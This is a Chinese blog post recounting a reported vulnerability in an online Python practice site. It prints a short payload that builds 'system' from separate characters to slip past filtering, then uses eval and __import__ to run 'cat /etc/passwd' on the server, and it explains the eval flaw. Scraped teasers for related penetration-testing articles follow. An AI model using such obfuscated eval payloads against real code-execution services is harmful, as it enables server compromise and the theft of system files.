有意思的python渗透案例

今天在wooyun里看到一个有意思的漏洞。说它有意思,第一是思路很特别,当然也是因为安全做的很low,第二里面使用的python的poc有个小细节,特此分享一下。

网站叫Fenby网,主要是为了pythoner在线学习的,它有一个在线练习的功能,可以输入代码,然后执行,测试运行结果。。。

于是楼主就注册了一个账号,URL:http://www.fenby.com/course/units/xxxx

然后输入如下一段恶意代码:

import string

s = ["s","y","s","t","e","m"]

s = "".join(s)

cmd = "cat /etc/passwd"

code = "__import__(‘os‘)." + s + "(‘" + cmd + "‘)"

eval(code)

于是就这样了。。。

这里我想说两点,第一造成漏洞的原因是没有过滤eval,第二代码里使用的import和__import__的不同。

import其实是调用的__import__但是如果直接写成 code = "__import__(‘package.module‘)",它的意思就不是说:import package.module as package

When the name variable is of the form package.module, normally, the top-level package (the name up till the first dot) is returned, not the module named by name.

时间: 2024-12-28 09:08:19

有意思的python渗透案例的相关文章

Python渗透测试工具合集

Python渗透测试工具合集 如果你热爱漏洞研究.逆向工程或者渗透测试,我强烈推荐你使用 Python 作为编程语言.它包含大量实用的库和工具, 本文会列举其中部分精华. 网络 Scapy, Scapy3k: 发送,嗅探,分析和伪造网络数据包.可用作交互式包处理程序或单独作为一个库. pypcap, Pcapy, pylibpcap: 几个不同 libpcap 捆绑的python库 libdnet: 低级网络路由,包括端口查看和以太网帧的转发 dpkt: 快速,轻量数据包创建和分析,面向基本的

Kali Linux(二)渗透案例:DNS Kaminsky缓存投毒

在详细介绍Kali Linux系统之前我们先通过一个渗透案例了解Kali Linux. 本文使用Kali Linux对正在做"本地缓存DNS"的微软windows server2008进行Kaminsky缓存投毒,最终将www.google.com引导到一个预先定义好的web界面上. (1)介绍渗透手段是为了我们在工作中能更好的做好安全防护工作,只有了解攻击才能做好防守.所以,我首先强烈谴责那些使用渗透工具,进行恶意攻击的行为. (2)在做本文实验之前,建议先阅读之前发布的DNS安全-

Python数据分析案例(实战)视频教程

38套大数据,云计算,架构,数据分析师,Hadoop,Spark,Storm,Kafka,人工智能,机器学习,深度学习,项目实战视频教程 视频课程包含: 38套大数据和人工智能精品高级课包含:大数据,云计算,架构,数据挖掘实战,实时推荐系统实战,电视收视率项目实战,实时流统计项目实战,离线电商分析项目实战,Spark大型项目实战用户分析,智能客户系统项目实战,Linux基础,Hadoop,Spark,Storm,Docker,Mapreduce,Kafka,Flume,OpenStack,Hiv

小猪佩奇社会人专用服务器,有意思的python小程序,附python代码

最近社会人小猪佩奇挺热门的,大家都在说社会人,那么我们作为IT人,怎么让我们的服务器也蹭一下社会人的热点的?下面来给大家说说. 先来个效果图: 小猪佩奇社会人专用服务器 哈哈,这样是不是挺有意思的?工作已经很无聊了,如果再不找点乐趣,那还怎么干活? 说说怎么实现的吧,其实这个是通过python代码实现的,而且代码仅仅只有30行. 需要说明的是,这个python代码不仅仅能转换小猪佩奇社会人,而且还能转换各种图片,比如佛祖啊什么的,只要你有色彩对比度差不多的图片,都可以进行转换. 如下图,我换了个

十五道Python小案例,学会这些,Python基础已过关!

十五道Python的小案例,不知道各位都会了多少! 一.猜数字 1到4能组成多少个互不相同且不重复数字的三位数?分别是? 分析:可填在百位.十位.个位的数字都是1.2.3.4.组成所有的排列后再去 掉不满足条件的排列. 程序源代码: 二.公司发放的奖金的计算 分析:请利用数轴来分界,定位.注意定义时需把奖金定义成长整型. 程序源代码: 三.一个整数加上100后是一个完全平方数,再加168又是一个完全平方数,请问该数是多少? 分析: 程序源代码: 四.输入*年*月*日,判断这一天是这一年的第几天?

【每天学点Python】案例八:空气质量指数计算

V1.0功能:AQI计算 案例描述: 案例分析: 实现步骤: 实现每种污染物对应的AQI函数,一个输入参数,即Cp 实现线性缩放函数,5个输入参数 上机实验: 1 #!/usr/bin/env python 2 # -*- coding:utf-8 -*- 3 # author: Kevin.Wang 4 # time : 2018/10/16 5 6 7 """ 8 作者:王鑫正 9 版本:1.0 10 日期:2018/10/16 11 功能:AQI计算 12 "

python数据分析案例实战——融360客户贷款风险预测(信用卡)

数据源:融360-用户贷款风险预测 参考资料:https://www.jianshu.com/p/aba5685c580a 流程如下: 项目目标 数据解读 数据预处理 特征工程 1.基于业务理解筛选 2.基于机器学习筛选 模型建立 一.项目目标 通过举办方提供的用户基本信息,消费行为,还款情况等,建立准确的逾期预测模型,以预测用户是否会逾期还款. 二.数据解读 相关专业名词可以去举办方融360官网上搜索https://www.rong360.com/ask/ 1.数据概述: 用户的基本属性use

Python学习案例之视频人脸检测识别

前言 上一篇博文与大家分享了简单的图片人脸识别技术,其实在实际应用中,很多是通过视频流的方式进行识别,比如人脸识别通道门禁考勤系统.人脸动态跟踪识别系统等等. 案例 这里我们还是使用 opencv 中自带了 haar人脸特征分类器,通过读取一段视频来识别其中的人脸. 代码实现: # -*- coding: utf-8 -*- __author__ = "小柒" __blog__ = "https://blog.52itstyle.vip/" import cv2 i

一个有意思的Python小程序(全国省会名称随机出题)

最近比较迷Python,仿照<Python编程快速上手>8.5写了一个随机出卷的小程序.程序本身并不难,关键是解决问题的思路,还有就是顺便复习了一下全国地名(缅怀一下周总理). OK其实还是有一个难点的,就是关于Python的中文编码问题,如何把中文字典输入到txt然后再把它读出来,程序中借用了json方法,而且在输出时decode.encode,有一些参考的价值吧.废话不说了,上程序. # *encoding:utf-8 * from __future__ import print_func